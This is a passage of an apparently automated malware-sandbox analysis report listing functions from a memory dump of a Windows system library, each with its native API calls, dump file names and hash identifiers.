                                                                                                                            • Instruction ID: 8f9dd52cb1d68e29279642a0ceb366a4ce5ec0831101340646846d7cb5376bf9
                                                                                                                            • Opcode Fuzzy Hash: c23f0ae734410a9d73bf579c07f5b5887f97bded13253a1d8847541bb4dd6aa6
                                                                                                                            • Instruction Fuzzy Hash: D621A271645A8DEFE7128FA8C884F997BF4EF09B48F1040D5E914972A1C77C8A42C761
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1D4CB0, Relevance: 3.1, APIs: 2, Instructions: 56memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlAllocateHeap.1105(?,?,?), ref: 6B1D4D02
                                                                                                                            • memcpy.1105(00000000,?,?), ref: 6B1D4D13
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateHeapmemcpy
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1925790395-0
                                                                                                                            • Opcode ID: 14cfad90bd60680465fd4b4666e7d19a710d328890408a423268b734d8ed5d1d
                                                                                                                            • Instruction ID: e2a7dabb7de4b774e3cf1772875840949f63e6c2107ac41c08a2bdc4e514bbd6
                                                                                                                            • Opcode Fuzzy Hash: 14cfad90bd60680465fd4b4666e7d19a710d328890408a423268b734d8ed5d1d
                                                                                                                            • Instruction Fuzzy Hash: C8117071A00A08AFE712CF69D941B9777E8EF55315F014469EAA9CB211DB39EC00DBA0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B262E14, Relevance: 3.1, APIs: 2, Instructions: 51nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlGetCurrentServiceSessionId.1105(00000000,?,?), ref: 6B262E5E
                                                                                                                            • ZwTraceEvent.1105(?,00020402,00000020,?), ref: 6B262E8E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentEventServiceSessionTrace
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 171358211-0
                                                                                                                            • Opcode ID: e87d6a524d885ac96c05867094b46d2428043d15cc6411e5e9cbaa959a303e9a
                                                                                                                            • Instruction ID: d7affc9ca14ab664af46914a3a59d479b80bb52aeb7c22cc284c42d278328391
                                                                                                                            • Opcode Fuzzy Hash: e87d6a524d885ac96c05867094b46d2428043d15cc6411e5e9cbaa959a303e9a
                                                                                                                            • Instruction Fuzzy Hash: DC111CB1A0121D9BCB00DFA9C585AAEB7F8FF58340F10406AF904E7351D738AA01CB94
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1D95F0, Relevance: 3.0, APIs: 2, Instructions: 47nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ZwSetInformationWorkerFactory.1105(?,00000004,00000000,00000004,00000000,?,?,6B1FF9CB,00000000,00000001,00000000,00000001,?,00000000,00000000), ref: 6B1D9621
                                                                                                                            • RtlGetCurrentServiceSessionId.1105(?,00000004,00000000,00000004,00000000,?,?,6B1FF9CB,00000000,00000001,00000000,00000001,?,00000000,00000000), ref: 6B1D9628
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentFactoryInformationServiceSessionWorker
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2490488586-0
                                                                                                                            • Opcode ID: b99ca973338ded875cf695b9a21ffe936fa816212ff8a6ca1792bfe0ad1d1fa1
                                                                                                                            • Instruction ID: 8e4817c0b805726eebaed95121c10d43f3b0ff249d0ac8e9b616d8b5f160b4c8
                                                                                                                            • Opcode Fuzzy Hash: b99ca973338ded875cf695b9a21ffe936fa816212ff8a6ca1792bfe0ad1d1fa1
                                                                                                                            • Instruction Fuzzy Hash: 4501F772A09548FBD7118AA8C970F5533EAAB81B78F114256EE148F291DB3CDD01C795
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B2A8966, Relevance: 3.0, APIs: 2, Instructions: 46nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlGetCurrentServiceSessionId.1105(00000000,?), ref: 6B2A89A2
                                                                                                                            • ZwTraceEvent.1105(?,00000403,00000018,?,00000000,?), ref: 6B2A89CF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentEventServiceSessionTrace
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 171358211-0
                                                                                                                            • Opcode ID: e5782cf5e25c5879e78ff2b66e732e363b15fd12ce4eab4fea0375d995924d39
                                                                                                                            • Instruction ID: 2692b16c2cd80a0f2ec7f943e15eabc2bd3be0703e9c549d909ba5856068bb75
                                                                                                                            • Opcode Fuzzy Hash: e5782cf5e25c5879e78ff2b66e732e363b15fd12ce4eab4fea0375d995924d39
                                                                                                                            • Instruction Fuzzy Hash: 890129B1A4125DABCB00CFA9D8859AEB7F8FF48300F10445AE905E7380D7789A01CBA1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B2A8A62, Relevance: 3.0, APIs: 2, Instructions: 44nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlGetCurrentServiceSessionId.1105(?,?,?,?,?,?,?,?,?,?,?,?,6B24971E,?,?,?), ref: 6B2A8A98
                                                                                                                            • ZwTraceEvent.1105(?,00020402,00000014,?,?,?,?), ref: 6B2A8AC5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentEventServiceSessionTrace
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 171358211-0
                                                                                                                            • Opcode ID: 8ca606e380c40c6ebf162bd8d0e624414a035d58c90b0b25bdfb0c6ff10afaa1
                                                                                                                            • Instruction ID: 3167f24b36c3d7ea34d52f405dbe6dbbc4d76bdb113051e253cf1349235bc233
                                                                                                                            • Opcode Fuzzy Hash: 8ca606e380c40c6ebf162bd8d0e624414a035d58c90b0b25bdfb0c6ff10afaa1
                                                                                                                            • Instruction Fuzzy Hash: FB011AB1A4125DAFCB00DFA9D9859EEB7F8EF49710F10405AFA04EB341D738A901CBA0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B2A8ADD, Relevance: 3.0, APIs: 2, Instructions: 44nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlGetCurrentServiceSessionId.1105(?,?,7FFE0386,?,?,?,?,?,?,?,?,?,?,?,6B231B21,?), ref: 6B2A8B13
                                                                                                                            • ZwTraceEvent.1105(?,00000403,00000014,?,?,?,7FFE0386), ref: 6B2A8B40
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentEventServiceSessionTrace
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 171358211-0
                                                                                                                            • Opcode ID: 95aa3ded075bc27bfe6487fb982d1e3186569e754d68718f0852089cb3fb3552
                                                                                                                            • Instruction ID: c07fe54c645aa4de603764dfc18d0a7a399684c85bcd0f579609bc86e87835fc
                                                                                                                            • Opcode Fuzzy Hash: 95aa3ded075bc27bfe6487fb982d1e3186569e754d68718f0852089cb3fb3552
                                                                                                                            • Instruction Fuzzy Hash: 37011EB1A4125DABDB00CFA9D9859EEB7F8FF49710F10405AF904E7390D7389A01CBA5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B2A89E7, Relevance: 3.0, APIs: 2, Instructions: 44nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlGetCurrentServiceSessionId.1105(?,?,7FFE0386,?,?,?,?,?,?,?,?,?,?,?,6B231AC9,?), ref: 6B2A8A1D
                                                                                                                            • ZwTraceEvent.1105(?,00000403,00000014,?,?,?,7FFE0386), ref: 6B2A8A4A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentEventServiceSessionTrace
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 171358211-0
                                                                                                                            • Opcode ID: 060f5fad1f80954bd22d1ac9537eaab9afa2c8a2a2f18784b2db48b507a0c054
                                                                                                                            • Instruction ID: 7ec6dfd5a04bf008cd545caeff4fcd73956444bfee06965662b1150d474df2bc
                                                                                                                            • Opcode Fuzzy Hash: 060f5fad1f80954bd22d1ac9537eaab9afa2c8a2a2f18784b2db48b507a0c054
                                                                                                                            • Instruction Fuzzy Hash: A4011EB5A4125DAFDB00CFA9D9859EEB7F8EF49750F50409AE904E7341D7389A01CBA0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B2A8ED6, Relevance: 3.0, APIs: 2, Instructions: 44nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlGetCurrentServiceSessionId.1105(?,?,?,?,?,?,?,?,?,?,?,?,6B243B1B,?,?,?), ref: 6B2A8F2A
                                                                                                                            • ZwTraceEvent.1105(?,00020402,0000001C,?), ref: 6B2A8F57
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentEventServiceSessionTrace
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 171358211-0
                                                                                                                            • Opcode ID: d5694b420c4056e31eb3676cd26bc08c6c3f0715520fc8be0d92b31303909775
                                                                                                                            • Instruction ID: 1dd7124dbfc98d9007583172dc63ee212040cff64428e70e8414b381ff6de17c
                                                                                                                            • Opcode Fuzzy Hash: d5694b420c4056e31eb3676cd26bc08c6c3f0715520fc8be0d92b31303909775
                                                                                                                            • Instruction Fuzzy Hash: CB111E70A452499FDB04DFA9C445BAEB7F4FF08300F5442AAE918EB382E7389941CB90
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B2A9CB3, Relevance: 3.0, APIs: 2, Instructions: 44nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlGetCurrentServiceSessionId.1105(?,?,7FFE0386,?,?,?,?,?,?,?,?,?,?,6B231AF4,?,?), ref: 6B2A9CE9
                                                                                                                            • ZwTraceEvent.1105(?,00000402,00000014,?,?,?,7FFE0386), ref: 6B2A9D16
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentEventServiceSessionTrace
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 171358211-0
                                                                                                                            • Opcode ID: a25ab3b1490f086ae597993b12652ecf612336bbad0c44daa32009ceb767a1cf
                                                                                                                            • Instruction ID: 932320c5eb84ba0baaa96a3ebc0f4b55f0e40d0a99d1f30952a63a9a71ebe2e7
                                                                                                                            • Opcode Fuzzy Hash: a25ab3b1490f086ae597993b12652ecf612336bbad0c44daa32009ceb767a1cf
                                                                                                                            • Instruction Fuzzy Hash: A8015EB1A4120CABCB00DFA9D9859AEB7F8FF48304F10405AE904E7341D738A901CBA0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1D7055, Relevance: 3.0, APIs: 2, Instructions: 43memorytimeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlDebugPrintTimes.1105(00000001,?,6B2AFE98,?,00000000,00000000,7FFFFFFF,?,?,?,?,6B26430E,?,6B2B08D0,00000008,6B209B80), ref: 6B1D7086
                                                                                                                            • RtlFreeHeap.1105(?,00000000,00000002,7FFFFFFF,?,?,?,?,6B26430E,?,6B2B08D0,00000008,6B209B80,?,?), ref: 6B1D70AB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: DebugFreeHeapPrintTimes
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3752032992-0
                                                                                                                            • Opcode ID: f7aa9c9e60ab550f1e19d007b87bb758738a18d786c6dbf9c90246e0ed336975
                                                                                                                            • Instruction ID: 53d90ff6bfcc4cfff2a68381689bb7aaac6a03e50f95aaff0eb3524c3bfc82ad
                                                                                                                            • Opcode Fuzzy Hash: f7aa9c9e60ab550f1e19d007b87bb758738a18d786c6dbf9c90246e0ed336975
                                                                                                                            • Instruction Fuzzy Hash: 1D018F31240648BBD725DF69CC0AFABB7F9EB45710F10059DE90583190CBA5A905C691
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B2A9BBE, Relevance: 3.0, APIs: 2, Instructions: 42nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlGetCurrentServiceSessionId.1105(?,?), ref: 6B2A9BF4
                                                                                                                            • ZwTraceEvent.1105(?,00000403,00000014,?,?,?), ref: 6B2A9C21
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentEventServiceSessionTrace
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 171358211-0
                                                                                                                            • Opcode ID: 407d2a05ad7d6110db169b98932525a48c33d33250b3fd4ddba71832632fb4a0
                                                                                                                            • Instruction ID: 4ca8f2a8ccf39c23a0697d2d6aa15adec16dab844c04e67d84aec849f9040459
                                                                                                                            • Opcode Fuzzy Hash: 407d2a05ad7d6110db169b98932525a48c33d33250b3fd4ddba71832632fb4a0
                                                                                                                            • Instruction Fuzzy Hash: 60018F71A4160CAFCB00CFA9D845AEEB7F8FF48310F10005AF904AB380D738AA11CB94
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1DB1E1, Relevance: 3.0, APIs: 2, Instructions: 42COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlGetCurrentServiceSessionId.1105(00000000,?,?,6B243BA6,00000000,?,6B1FDFDF,?,00000000,6B2C7B60,6B2AFE18,00000028), ref: 6B1DB1EC
                                                                                                                            • RtlGetCurrentServiceSessionId.1105 ref: 6B234A34
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentServiceSession
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1007659313-0
                                                                                                                            • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                                                                                            • Instruction ID: 5782c4560676d720f4e3ada9120c9c0907a2d0077c5cce161d241113693d890b
                                                                                                                            • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                                                                                            • Instruction Fuzzy Hash: C301D133240694ABD312876EC844F8A7BD9EF92754F0940E2F9248B6B1D77DD801C224
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B205AA0, Relevance: 3.0, APIs: 2, Instructions: 41nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ZwSetInformationWorkerFactory.1105(?,00000005,00000000,00000004,00000000,?,?,6B2A80F8,00000000,00000000,6B2C86C4,6B2C86C4,00000008,?,00000000,00000008), ref: 6B205AD1
                                                                                                                            • RtlGetCurrentServiceSessionId.1105(?,00000005,00000000,00000004,00000000,?,?,6B2A80F8,00000000,00000000,6B2C86C4,6B2C86C4,00000008,?,00000000,00000008), ref: 6B205AD6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentFactoryInformationServiceSessionWorker
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2490488586-0
                                                                                                                            • Opcode ID: c9b001a91482740e9157406d5ad749f8f827d34b66fe1a1f9de7b8e59cb761b8
                                                                                                                            • Instruction ID: 1147830e09b3997fca6fd3825830973f6b23ee11ad11dd8a433177676088e601
                                                                                                                            • Opcode Fuzzy Hash: c9b001a91482740e9157406d5ad749f8f827d34b66fe1a1f9de7b8e59cb761b8
                                                                                                                            • Instruction Fuzzy Hash: 3C01863255554DAFD711CB68C8C5F9977E8AB01B25F004192FE249B290DBBCDD40D791
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B28FDD3, Relevance: 3.0, APIs: 2, Instructions: 39nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlGetCurrentServiceSessionId.1105(?,?,?,?,?,?,?,6B29B6F0,?,?,?,?,00000000), ref: 6B28FDFE
                                                                                                                            • ZwTraceEvent.1105(?,00020402,00000008,?,?,?,?,?,?,?,?,6B29B6F0,?,?,?,?), ref: 6B28FE2B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentEventServiceSessionTrace
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 171358211-0
                                                                                                                            • Opcode ID: 868115c4e320bb95899ec1448201ebe2fe0273c26404f700ea4e32282a9c8dc1
                                                                                                                            • Instruction ID: e82363f22e5d83550e819db231b347c3d5bb6039d06f44b90ea666e0ba6b9967
                                                                                                                            • Opcode Fuzzy Hash: 868115c4e320bb95899ec1448201ebe2fe0273c26404f700ea4e32282a9c8dc1
                                                                                                                            • Instruction Fuzzy Hash: 2DF0AF71B4524CABDB04DBB9D846E6EB3F8EF45600F4000A9A900EB6D1EA38D916C745
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B29131B, Relevance: 3.0, APIs: 2, Instructions: 36nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlGetCurrentServiceSessionId.1105(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6B23E38A,00000000), ref: 6B291348
                                                                                                                            • ZwTraceEvent.1105(?,00020402,00000010,?), ref: 6B291375
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentEventServiceSessionTrace
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 171358211-0
                                                                                                                            • Opcode ID: cb229180219b05494046cf24f07dc68bac29900efa6bd329e93b45fd2dc4c318
                                                                                                                            • Instruction ID: 41b922494cdef950945bf341aa7ef6337f9dff40e775ec8d5fb7161136de9e8b
                                                                                                                            • Opcode Fuzzy Hash: cb229180219b05494046cf24f07dc68bac29900efa6bd329e93b45fd2dc4c318
                                                                                                                            • Instruction Fuzzy Hash: 93018170A4120CAFCB00DFA9D546A9EB7F8FF08700F404059B905EB381E738DA00CB55
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B2A8F6A, Relevance: 3.0, APIs: 2, Instructions: 36nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlGetCurrentServiceSessionId.1105(?,?,?,?,6B242CE2,?,?,00000000,?,00002710,00000000,?,?,?), ref: 6B2A8F97
                                                                                                                            • ZwTraceEvent.1105(?,00000402,00000010,?,?,?,?,?,6B242CE2,?,?,00000000,?,00002710,00000000,?), ref: 6B2A8FC4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentEventServiceSessionTrace
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 171358211-0
                                                                                                                            • Opcode ID: da62a4cfbeb04c25f37a5f6603361e9ab21e213ea580fd3cb324a9fffb2b9e18
                                                                                                                            • Instruction ID: d3b6b2a1ae783e354591c45f8a6918f4e6ea657aa599298106c3ef7076add18f
                                                                                                                            • Opcode Fuzzy Hash: da62a4cfbeb04c25f37a5f6603361e9ab21e213ea580fd3cb324a9fffb2b9e18
                                                                                                                            • Instruction Fuzzy Hash: 2C013174A4524DAFDB00DFB8D545A9EB7F4EF48300F504059B904EB381DB38DA00CB94
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B262EA3, Relevance: 3.0, APIs: 2, Instructions: 36nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlGetCurrentServiceSessionId.1105 ref: 6B262ED5
                                                                                                                            • ZwTraceEvent.1105(?,00020402,0000000C), ref: 6B262F02
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentEventServiceSessionTrace
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 171358211-0
                                                                                                                            • Opcode ID: 60371760827ea58bb9f7904789288bf24365a7fbd87bcfa4940f8fd97f1384ed
